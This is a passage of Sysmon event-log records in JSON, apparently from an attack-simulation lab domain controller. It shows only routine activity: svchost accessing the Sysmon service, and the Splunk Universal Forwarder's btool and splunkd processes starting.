06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2035,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2036,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2037,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2038,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2039,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.036\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.036","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","TargetProcessId":"2764","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2040,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.047\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-0010DFEC0300}\r\nProcessId: 2800\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-106F-5F25-0000-00101EEC0300}\r\nParentProcessId: 2764\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.047","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-0010DFEC0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-106F-5F25-0000-00101EEC0300}","ParentProcessId":"2764","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list replication_port --no-log","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
